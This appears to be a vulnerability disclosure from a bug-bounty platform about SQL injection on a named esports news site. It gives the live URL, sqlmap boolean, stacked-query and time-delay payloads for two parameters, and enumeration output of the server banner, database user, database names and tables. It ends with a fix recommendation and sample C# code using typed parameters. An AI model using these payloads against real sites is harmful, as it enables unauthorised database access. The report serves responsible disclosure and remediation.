2014-09-29: Details reported to the vendor, awaiting vendor handling
2014-09-30: Vendor confirmed; details disclosed to the vendor only
2014-10-10: Details disclosed to core white hats and relevant domain experts
2014-10-20: Details disclosed to regular white hats
2014-10-30: Details disclosed to intern white hats
2014-11-13: Details disclosed to the public
SQL injection on a subsite of a large domestic esports platform
I first played DOTA on Haofang :) Vulnerable URL:
http://news.cga.com.cn/app/list.aspx?ItemId=13&categoryid=4
Injection parameters:
ItemID, categoryid
Payload:
---
Place: GET
Parameter: ItemId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ItemId=13) AND 6213=6213 AND (2258=2258&categoryid=4

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ItemId=13); WAITFOR DELAY '0:0:5'--&categoryid=4

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ItemId=13) WAITFOR DELAY '0:0:5'--&categoryid=4

Place: GET
Parameter: categoryid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ItemId=13&categoryid=4) AND 9641=9641 AND (4531=4531

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ItemId=13&categoryid=4); WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ItemId=13&categoryid=4) WAITFOR DELAY '0:0:5'--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: categoryid, type: Unescaped numeric (default)
[1] place: GET, parameter: ItemId, type: Unescaped numeric
[q] Quit
Current database info:
[03:16:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[03:16:39] [INFO] fetching current user
[03:16:39] [INFO] resumed: UnionNewWebDBUser
current user: 'UnionNewWebDBUser'
[03:16:39] [INFO] fetching current database
[03:16:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:16:39] [INFO] retrieved:
[03:16:39] [WARNING] reflective value(s) found and filtering out
UnionNews
current database: 'UnionNews'
Server banner:
banner:
---
Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64)
    Jun 17 2011 00:54:03
    Copyright (c) Microsoft Corporation
    Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
---
Dumping databases:
available databases [28]:
[*] DntForum
[*] HF_Maps
[*] HF_Match
[*] HFActivity
[*] HFAwardSys
[*] HFClanSys
[*] HFEvent2013
[*] HFEvent2013Apr
[*] HFGoldenLeague
[*] HFHelpSys
[*] HFNetBar
[*] HFReportComplain
[*] HFWebApp
[*] HFZhanLing
[*] JDDB
[*] ManagementSystem
[*] master
[*] model
[*] msdb
[*] Nest
[*] pv
[*] QuestionnaireSys
[*] RencunBeckon
[*] RencunDIY
[*] RencunGift
[*] tempdb
[*] UnionNews
[*] Woool2WebDB
Dumping tables:
[03:40:54] [INFO] retrieved: dbo.Admin
[03:41:25] [INFO] retrieved: dbo.Admin_Category
[03:42:05] [INFO] retrieved: dbo.Admin_Item
[03:42:29] [INFO] retrieved: dbo.Admin_Permission
[03:43:10] [INFO] retrieved: dbo.Admin_Tag
[03:43:28] [INFO] retrieved: dbo.Admin_Template
[03:44:04] [INFO] retrieved: dbo.AspNet_SqlCacheTablesForChangeNotification
[03:46:28] [INFO] retrieved: dbo.Category
[03:47:05] [INFO] retrieved: dbo.comd_list
[03:47:40] [INFO] retrieved: dbo.Item
[03:47:59] [INFO] retrieved: dbo.jiaozhu
[03:48:30] [INFO] retrieved: dbo.lunhui
[03:48:57] [INFO] retrieved: dbo.News
[03:49:18] [INFO] retrieved: dbo.News_Comment
[03:49:49] [INFO] retrieved: dbo.News_v
[03:50:00] [INFO] retrieved: dbo.Pic
[03:50:16] [INFO] retrieved: dbo.Reg_Arrt
[03:50:45] [INFO] retrieved: dbo.Tag
[03:51:01] [INFO] retrieved: dbo.Template
[03:51:29] [INFO] retrieved: dbo.Vote
[03:51:44] [INFO] retrieved: dbo.Vote_items
[03:52:13] [INFO] retrieved: dbo.Vote_logs
Database: UnionNews
[22 tables]
+--------------------------------------------+
| Admin                                      |
| Admin_Category                             |
| Admin_Item                                 |
| Admin_Permission                           |
| Admin_Tag                                  |
| Admin_Template                             |
| AspNet_SqlCacheTablesForChangeNotification |
| Category                                   |
| Item                                       |
| News                                       |
| News_Comment                               |
| News_v                                     |
| Pic                                        |
| Reg_Arrt                                   |
| Tag                                        |
| Template                                   |
| Vote                                       |
| Vote_items                                 |
| Vote_logs                                  |
| comd_list                                  |
| jiaozhu                                    |
| lunhui                                     |
+--------------------------------------------+
So many tables, no idea what they're for... Would digging further affect the platform's players? Too exciting; I'll stop here. I just want to know which school teaches the best excavator skills?
Fix recommendation: add type checking and filtering on the parameters :)
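As an added illustration of that fix (example code written for this page, not the site's own), a hypothetical ASP.NET code-behind for list.aspx that accepts ItemId and categoryid only as integers and binds them as typed SQL Server parameters; the table dbo.News, its columns, the NewsList control and the connection-string name are assumed.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;
using System.Web.UI;
// Hypothetical code-behind for list.aspx (added example, not the site's own code).
// Table, column, control and connection-string names are assumptions.
public partial class ListPage : Page
{
    // Accepts only a plain unsigned decimal integer. The report's values such as
    // "13) AND 6213=6213" or "4); WAITFOR DELAY '0:0:5'--" fail here, before any SQL runs.
    public static int? ParseId(string raw)
    {
        int value;
        if (raw == null || !int.TryParse(raw, NumberStyles.None, CultureInfo.InvariantCulture, out value))
            return null;
        return value;
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        int? itemId = ParseId(Request.QueryString["ItemId"]);
        int? categoryId = ParseId(Request.QueryString["categoryid"]);
        if (itemId == null || categoryId == null)
        {
            // Reject instead of falling back to a default: a malformed id is not a valid request.
            Response.StatusCode = 400;
            Response.SuppressContent = true;
            Context.ApplicationInstance.CompleteRequest();
            return;
        }
        // Typed parameters travel separately from the SQL text, so neither a closing ")",
        // a stacked ";" nor a WAITFOR DELAY can be smuggled in through ItemId or categoryid.
        const string sql = "SELECT Title, PublishTime FROM dbo.News WHERE ItemId = @ItemId AND CategoryId = @CategoryId";
        string cs = ConfigurationManager.ConnectionStrings["UnionNews"].ConnectionString;
        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@ItemId", SqlDbType.Int).Value = itemId.Value;
            cmd.Parameters.Add("@CategoryId", SqlDbType.Int).Value = categoryId.Value;
            conn.Open();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                NewsList.DataSource = reader;   // NewsList: an asp:Repeater declared in the markup
                NewsList.DataBind();
            }
        }
    }
}
```

Rejecting malformed ids with a 400 also gives a clean signal for request logs: any hit on list.aspx that fails ParseId is worth a look, and the report's time-based payloads can no longer hold a worker thread for five seconds.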
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-09-30 08:52
Thanks xyang for the vulnerability.
None yet